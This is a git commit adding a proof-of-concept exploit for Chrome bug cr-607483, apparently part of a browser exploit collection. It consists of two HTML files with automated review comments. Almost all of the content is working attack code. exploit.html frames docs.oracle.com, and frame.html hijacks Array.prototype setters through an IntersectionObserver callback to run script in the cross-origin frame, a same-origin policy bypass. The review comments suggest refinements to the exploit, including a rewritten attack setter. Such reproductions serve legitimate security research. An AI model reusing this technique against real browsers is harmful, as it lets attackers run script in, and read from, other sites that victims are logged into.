
Commit 44b689c

committed
feat(chrome): add cr-607483
1 parent a714a22 commit 44b689c


2 files changed

+145
-0
lines changed


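--- a/chrome/cr-607483/exploit.html
+++ b/chrome/cr-607483/exploit.html
@@ -0,0 +1,19 @@
+<script>
+if (location.protocol == 'file:') {
+throw alert('HTTP server is required.');
+}
+
+var i1 = document.documentElement.appendChild(document.createElement('iframe'));
+var i2 = document.documentElement.appendChild(document.createElement('iframe'));
+i1.onload = i2.onload = f;
+i1.width = i1.height = "90%";
+i2.width = i2.height = "0";
+i1.src = i2.src = '//docs.oracle.com/javase/8/docs/api/index.html';
+
+var c = 0;
+function f() {
+if (++c == 2) {
+frames[0][0].location = 'frame.html';
+}
+}
+</script>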
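Review bot: The file-protocol guard on line 3 uses `throw alert('HTTP server is required.');`, which throws `undefined` because `alert()` returns nothing; the intent to halt the script reads more clearly as `alert('HTTP server is required.'); throw new Error('HTTP server is required.');`. The file also has no header comment recording which bug it reproduces, the browser build it was verified against, or which observable result counts as a reproduction — suggest a leading `<!-- PoC for cr-607483; verified on Chrome <VERSION-PLACEHOLDER>; reproduction = alert raised from frame.html -->`. Both frames load a live third-party origin through a protocol-relative URL on line 11 (`//docs.oracle.com/...`), so the test inherits the harness's scheme and will silently stop reproducing if that site changes or redirects; noting that dependency in the header keeps a future reader from mistaking a dead test for a fixed bug.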

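--- a/chrome/cr-607483/frame.html
+++ b/chrome/cr-607483/frame.html
@@ -0,0 +1,126 @@
+<script>
+
+var t = top;
+
+onload = function () {
+
+var io = new IntersectionObserver(function () {}, {});
+
+io.observe(document.getElementById("o1"));
+io.observe(document.getElementById("o2"));
+
+Object.defineProperty(Array.prototype, "0", {
+get: function () {},
+set: function (v) {
+var a = document.createElement('a');
+a.href = 'about:blank';
+a.click();
+t.i1.remove();
+}
+});
+
+Object.defineProperty(Array.prototype, "1", {
+get: function () {},
+set: function () {
+arguments[0].constructor.constructor('w', 'w.alert(w.location);')(t.frames[0]);
+}
+});
+
+document.getElementById("o2").scrollIntoView();
+
+};
+
+</script>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<p>Filler</p>
+<div id=o1>Observed</div>
+<div id=o2>Observed</div>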
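Review bot: The two `Array.prototype` index setters on lines 12–27 are the substance of this file, yet neither carries a comment saying what they are expected to intercept or why the two observed elements and the `scrollIntoView()` call on line 29 are needed before they fire; a one-line comment above each `Object.defineProperty` stating the trigger it relies on would let a triager confirm whether a given build is still affected without re-deriving the sequence. The setter on line 24 reads its argument through `arguments[0]` while the sibling on line 14 names it `v`; a named parameter is clearer and consistent: `set: function (entry) { entry.constructor.constructor('w', 'w.alert(w.location);')(t.frames[0]); }`. The `id` attributes on lines 125–126 are unquoted (`<div id=o1>`), so quote them (`<div id="o1">`) to match the `getElementById("o1")` lookups and keep the markup valid under stricter linting.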
